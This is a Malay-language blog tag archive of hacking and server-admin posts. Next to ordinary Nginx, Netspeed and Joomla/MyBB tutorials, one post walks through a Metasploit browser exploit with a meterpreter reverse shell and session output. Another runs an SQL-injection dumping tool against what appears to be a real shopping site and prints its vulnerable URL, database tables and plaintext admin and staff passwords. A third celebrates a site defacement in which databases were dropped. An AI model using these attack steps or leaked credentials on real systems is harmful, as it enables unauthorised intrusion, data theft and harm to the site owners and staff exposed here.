Tag Archives: network&hacking

Nginx – 413 Request Entity Too Large

Haa.. Seperti tajuk diatas, bagi sape2 yang pernah configure & run server Nginx ni, korang pernah kena macam ni tak?
Benda ni jadi masa aku nak uploadkan theme kat wordpress.. Nak install theme la..
Saiz theme tu dalam 1.2MB.. Sekali keluar error macam tu..
So, dicari2 solutionnya.. Jumpa jugak..

Mari kita tengok macam mana solution dia..
First, kita kena edit file configuration nginx ni.. Kita taip ni:

Masukkan password korang, dan nanti keluarlah configuration dia kat terminal tu..
Lepas tu kita kena masukkan line ni..

Function dia untuk menetapkan jumlah memori untuk server tu..
Letakkan line tadi tu kat sini..

http {
include /etc/nginx/mime.types;

access_log /var/log/nginx/access.log;

sendfile on;
#tcp_nopush on;

#keepalive_timeout 0;
keepalive_timeout 2;
tcp_nodelay on;

gzip on;
gzip_disable “MSIE [1-6].(?!.*SV1)”;

include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;

client_max_body_size 4M;
client_body_buffer_size 128k;
}

Haa.. Nampak tak? Lepas tu korang tekan CTRL-O untuk write-out dan save..
Nak exit tekan CTRL-Z.. Lepas tu korang try restart nginx korang.. taip kan:

Kalau tak ada masalah apa2, dia akan restart dengan elok.. Lepas tu try korang upload theme tu balik..
Insyallah mesti boleh.. Sebab aku da buat & da jadi pun! 😀
Apa2 pertanyaan bolehlah tanya aku.. Insyallah aku cuba tolong korang..

Netspeed kat panel Ubuntu.

Assalamualaikum & Salam sejahtera.
Rasanya agak lama juga aku tak jenguk ke blog aku ni.
Kesian dia. Ditinggalkan begitu saja.
Bukan sengaja nak buat macam tu.
Tapi maklumlah. Banyak sangat kerja nak dibuat.
So masa tu kurang nak ada la untuk update blog ni.

Apa-apa pun, untuk entri kali ni,
aku nak sharekan ngan korang macam mana nak install Netspeed ni.
Kalo korang tak tau apa itu Netspeed ni,
korang boleh tengok kat sini.

So, memula sekali kita tulis macam ni.

sudo apt-get install netspeed

dia akan kuar banyak-banyak tulisan kat terminal korang tu.
Maknanya Ubuntu korang tu tengah install Netspeed tu la..

Lepas dah install benda tu,
korang klik kanan kat panel korang tu,
klik kat Add to Panel,
Cari Network Monitor Netspeed Applet.
Pastu korang add kan ke panel korang.

Lepas ni korang dah boleh tengok bape laju speed internet korang.
Tak kiralah samada Wireless or Broadband or LAN.

Metasploit?

Korang pernah tak teringin nak guna metasploit?
Korang penah tak dapat buat satu session menggunakan metasploit?
Aku tak pernah dapat gune metasploit ni.. 🙁

Tapi aku tak pernah mengalah(kecuali perkara2 tertentu)..
Akhirnya aku dapat jugak guna..
Dan dapat jugak access ke PC tu.. 🙂

So, meh aku kongsikan macam mana aku dapat buat benda ni..
Pertama, korang install dulu Metasploit.
Tak kesahlah versi apa2 pun.
Nanti boleh update.

Lepas dah install, jangan lupa untuk update.
Supaya korang dapat menggunakan lebih banyak sumber exploit kelak.

Lepas dan install & update,
korang run kan Metasploit.
Run yang console punya tau.
Sebab orang selalu cakap,
yang pakai CLI ni lagi efektif.
So, korang patut cuba.. 😉

Lepas dah run,
korang taipkan macam ni..

use windows/browser/ms06_001_wmf_setabortproc

Itu adalah exploit yang kita akan gunakan..
Exploit ni dia menggunakan browser(IE) untuk menjalankan kerja2 nya..

Lepas dah setkan exploit korang,
setkan pulak payload korang..

set payload windows/meterpreter/reverse_tcp

Lepas dah setkan payload tu,
korang assignkan/isikan apa2 yang patut macam LHOST, LPORT, SRVHOST, URL & lain2 yang berkenaan..

set SRVHOST 192.168.56.101
set LHOST 192.168.56.101

Lepas dah setkan suma,
taipkan show options untuk tengok balik semua setting2 korang tu..
Ngam ke tak. Apa yang dia require tu korang isikan la kalo tak isi lagi..

Lepas dah setel semua,
korang taipkan exploit..
Dia akan keluar lebih kurang macam ni..

[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[-] Handler failed to bind to 192.168.56.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://192.168.56.101:8080/asjKYXWBb3z
[*] Server started.
[*] Sending exploit to 192.168.56.102:1274...
[*] Sending stage (748032 bytes) to 192.168.56.102

So, korang kenalah buatkan mangsa korang tu pergi ke URL http://192.168.56.101:8080/asjKYXWBb3z tu..
Barulah menjadi..
Kalo tak memang sampai bila2 lah tak jalan exploit & payload tu.. :p

Lepas korang dah bagi mangsa korang bukak URL tu,
korang akan dapat tengok kat msfconsole korang tu flow yang exploit sedang dijalankan ke mangsa yang bukak URL tu..

Kalo exploit korang menjadi,
dia akan keluar lebih kurang macam ni..

[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1275) at 2010-08-07 00:57:21 +0800

Haa.. Dah kena! Korang dah ada 1 session ngan dia..
Bole la korang upload/download dan macam2 lagi kat PC dia..
Meh kita tengok..

msf exploit(ms06_001_wmf_setabortproc) > sessions -l

Active sessions
===============

Id  Type         Information                         Connection
--  ----         -----------                         ----------
1   meterpreter  4NGRY-LE0P4RDzer0 @ 4NGRY-LE0P4RD  192.168.56.101:4444 -> 192.168.56.102:1275

msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:Documents and Settingszer0Desktop
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:17 +0800  .
40777/rwxrwxrwx   0        dir   2010-06-05 15:09:29 +0800  ..
100777/rwxrwxrwx  690176   fil   2009-10-28 10:56:12 +0800  .NET Version Detector 2010.exe
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:19 +0800  Core_impact4
40777/rwxrwxrwx   0        dir   2010-06-05 16:37:23 +0800  Desktop
100666/rw-rw-rw-  1677     fil   2010-06-26 04:14:53 +0800  Process Hacker.lnk
100666/rw-rw-rw-  626      fil   2010-06-05 15:16:34 +0800  mirc.lnk
40777/rwxrwxrwx   0        dir   2010-06-05 14:54:58 +0800  nc111nt
100777/rwxrwxrwx  1261193  fil   2010-03-29 16:40:18 +0800  processhacker-1.11-setup.exe

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:af:62:54
IP Address  : 192.168.56.102
Netmask     : 255.255.255.0

Yeay! Saya dah berjaya. Haha..
Benda simple je kot..
Saya rasa orang lain tak pandang pun kalo saya dapat buat macam ni.. 🙁

Anyway, selamat mencuba la ye.
Ada pape, bole tanya saya.. 🙂

Bridging Joomla with MyBB

Assalamualaikum dan Salam Sejahtera semua..

Korang pernah tak terpikir macam mana kalau korang ada dua jenis website yang berbeza,
tapi korang nak user2 korang kat kedua-dua belah site tu sama?
Pernah tak korang fikir?

Benda ni jadi kat aku baru-baru ni.
Lepas aku launch kan portal dan forum group aku.
Lepas tu ada kawan aku tanya kat aku soalan macam ni.
So, aku pun terpikir jugak macam mana caranya dan cuba cari la solution nya.

Akhirnya, aku jumpa benda ni.
JFusion.
Plugin untuk memudahkan korang integrate/bridging site korang.
So, pada entry kali ini aku nak share ngan korang semua macam mana nak integrate kan Joomla ngan MyBB.
Sebenarnya korang boleh jugak nak integrate kan dengan benda lain.
Contohnya, Joomla ngan phpBB3, Joomla ngan SMF, Joomla ngan vBulletin.
Tapi aku just nak tunjukkan kali ni cara nak bridging Joomla ngan myBB.

So, langkah pertama, korang download dulu plugin yang bernama JFusion.
Download lah yang paling latest.

Lepas korang dah download, korang login ke Joomla administrator.
Pegi ke tab Extension, dan klik Install/Uninstall.
Kat tempat bertulis “Upload Package File”, korang klik “browse”, dan cari file JFusion yang korang download tadi(bentuk .zip file). Pastu korang klik “Upload File & Install”.


So, tunggulah kejap sementara dia upload kan file tu & install.
Lepas dah selesai sume tu, die akn keluar page macam ni (lebih kuranglah).


Korang pegi kat bahagian configure.
Edit configuration untuk myBB.



Description Biarkan default
Full URL to Software http://... (url mybb)
Full Path to Software /home/public_html/... (path ke mybb folder)
Cookie Domain .www.url_mybb... (yang korang letak masa install mybb)
Cookie Path /mybb*/ (*kat mana mybb di install)
Cookie Prefix Biarkan default (empty)

Database Type (ie mysql) mysql(biasanya)
Database Host localhost(biasanya)
Database Name nama database mybb tu
Database Username username database mybb tu
Database Password password database mybb tu
Table Prefix mybb_ (biasanya)
Database Charset (defaults to utf8) Biarkan default

Login Identifier Pilih macam mana user korang nak dikenal-pasti

Default Usergroup Registered(biasanya)
Usergroup for users awaiting activation Guest(biasanya)

Auto Update Activation Yes
Auto Update Bans Yes
Auto Update Email Yes
Create new user in this software for inactive users? Yes
Create new user in this software for blocked users? Yes

Lepas dah configure, korang save benda tu.
Lepas tu kita configure pulak Current Joomla Site(joomla_int).

Lepas dah configure kedua-duanya, kita kenalah enable kan plugin ni.
So, kita pilih kat master untuk joomla_int dan slave untuk mybb.
Dia akan jadi macam ni la.


Lepas korang dah configure benda alah ni,
Dan configuration tu ada masalah, dia akan bagitau kat bahagian atas sekali.

So, kalo configuration pun da betul, memang akan keluar 1 error mengatakan kat slave tu korang kena disable kan registration.

So, korang login ke mybb punya admin,
Pergi kat tab Configuration, Settings, User Registration and Profile Options.
Pastu tick kan Yes.


Lepas korang da disable kan registration kat mybb,
Barulah korang enable kan plugin JFusion ni.


Selepas korang dah enable plugin ni,
Korang synchronize la user-user korang.
Tapi sebelum korang start meng-synchronize-kan  table user korang,
Back-up la dulu ye sebelum apa-apa perkara yang korang ‘sangat suka’ berlaku.

Synchronization ni ada dua cara.
1. Import slave users ke master database
2. Synchronize kan master user database dengan slave databases.

Step 1 tu kalo korang da ada user sebelum ni kat mybb/slave db korang.
So korang pilih step 1 tu untuk import kan user dari slave ke master db.
Senang cite, korang run je la dua-dua step tu.
Baru balance sikit user korang untuk kedua-dua belah punya db.. :p

So, sampai sini je la tutorial aku ye.
Aku pun dapat benda ni masa dok cari kat Google.
Tapi yang itu cara dia lain.
Maybe sebab dia pakai JFusion version lama kot.
Tapi tak pa. Tak da apa-apa masalah pun.

Nak Tanya apa-apa, komen je la kat sini ye.

*Credit to ZoomCities! untuk tutorial ni.

darkMSSQL tutorial

Hari ini aku nak tunjukkan macam mana cara menggunakan darkMSSQL.py…

benda ni digunakan untuk MSSQL database yang ade error..
Aku jarang jumpa database MSSQL yang ada error..
Kalau jumpa pun, nasib2 je..

Tu agaknya pemalas sangat la tu Web Admin dia..
Server GMi pun pakai server jenis MSSQL jgk..
Oppss! Sori! :p

Apa2 pun, jom kita tengok macam mana aku gunakan darkMSSQL.py ni..

darkMSSQL.py journey… begin…


-h command (help)
Usage: ./darkMSSQL.py [options]                       rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --info    Gets MySQL server configuration only.
Define: --dbs     Shows all databases user has access too.
Define: --schema  Enumerate Information_schema Database.
Define: --dump    Extract information from a Database, Table and Column.
Define: --insert  Insert data into specified db, table and column(s).

Required:
Define: -u        URL "www.site.com/news.asp?id=2" or "www.site.com/index.asp?id=news'"

Mode dump and schema options:
Define: -D        "database_name"
Define: -T        "table_name"
Define: -C        "column_name,column_name..."

Optional:
Define: -p        "127.0.0.1:80 or proxy.txt"
Define: -o        "ouput_file_name.txt"        Default is darkMSSQLlog.txt
Define: -r        "-r 20" this will make the script resume at row 20 during dumping
Define: --cookie  "cookie_file.txt"
Define: --debug   Prints debug info to terminal.

Ex: ./darkMSSQL.py --info -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --dbs -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --schema -u "www.site.com/news.asp?id=2" -D dbname
Ex: ./darkMSSQL.py --dump -u "www.site.com/news.asp?id=2" -D dbname -T tablename -C username,password
Ex: ./darkMSSQL.py -u "www.site.com/news.asp?news=article'" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass

[email protected]:~/Desktop$ python darkMSSQL.py --info -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:25
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying information about MSSQL host!

[+] @@VERSION: Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
May  3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

[+] USER: mylittletail_usr
[+] DB_NAME(): mylittletail_db
[+] HOST_NAME(): SERVER439

[+] Script detected Microsoft SQL Version:  2000
[+] Checking to see if we can view password hashs... Nope!

[-] [00:19:26]
[-] Total URL Requests 5
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dbs -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL: http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:39
[+] Cookie: None
[-] Proxy Not Given
[+] Displaying list of all databases on MSSQL host!

[0] mylittletail_db
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] lotteryuk_db
[8] mylittletail_db
[9] sailor_db

[-] 00:19:41
[-] Total URL Requests 11
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --schema -D mylittletail_db -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:31:03
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying tables inside DB: mylittletail_db

[0] addon
[1] category
[2] country
[3] delivery
[4] discount
[5] dtproperties
[6] featured_category
[7] featured_item
[8] featured_maincategory
[9] item_packages
[10] item_questions
[11] items
[12] items_addon
[13] items_also
[14] main_items
[15] member
[16] message
[17] millkak
[18] newsletter_counter
[19] newsletter_log
[20] newsletter_master
[21] order
[22] order_item
[23] subcategory
[24] sysconstraints
[25] syssegments
[26] t_jiaozhu
[27] temp_order
[28] temp_order_id
[29] ticketing
[30] uploadform
[31] userlog
[32] users

[-] [00:31:09]
[-] Total URL Requests 34
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dump -D mylittletail_db -T users -C username,password -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:27:52
[+] Cookie: None
[+] Proxy Not Given
[0] 20admin08:72hu1ge9 admin
[1] yennee08:01yen04nee admin
[2] jolen18e:dedica18 staff
[3] jason:11jas37on5 admin
[4] katrina03:031983 staff
[5] zack09:20gift09 staff
[6] 3sales69:3moneytail69 staff

[-] [00:27:54]
[-] Total URL Requests 8
[-] Done

Don't forget to check darkMSSQLlog.txt

korang paham x bnd ni?

klu x paham, bole tny aku..

bukannya susah sgt pn.. 😀

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! 🙂

Jasakom pwnd! ;)

jasakom-hacked

the most egos, established Indonesian underground security team called “Jasakom” has been hacked by Malaysian local underground hacker, TBD.my & HMSecurity.
this is result of declaring cyber war against Malaysian sites, thus targeting and hacking into most of Malaysian site with malicious and disaster intent.

TBD.my says:

HACKED BY TBD.MY

Sepandai tupai melompat, akhirnya jatuh ke tanah juga.
I came here for a revenge for what you have done to our early tbd.
How does it feel now? you website has been hacked! Do you even have backup?
Do whatever you want, who cares, Good luck with your backup.
If its not because of Indonesian stupidity, we (Malaysian) don’t even how to hate Indonesia.
Why we hack you? because of Indonesian egos and stupidity.
We don’t hate Indonesian, but YOU (Indonesian) make us hate you.
All database has been dropped like you did to tbdsecurity.com database 🙂
JASAKOM, IF YOU THINK YOU ARE SECURE ? YOURE NOT!!
youre nothing just piece of crap. We wont attack you, If you stay away from .my sites
Greetz: XShimeX, suhz, Th3-Banjarian, TBD.MY, Dark Malaysia, HMSecurity, d3ck4

credit goes to hackingexposed.blogspot.com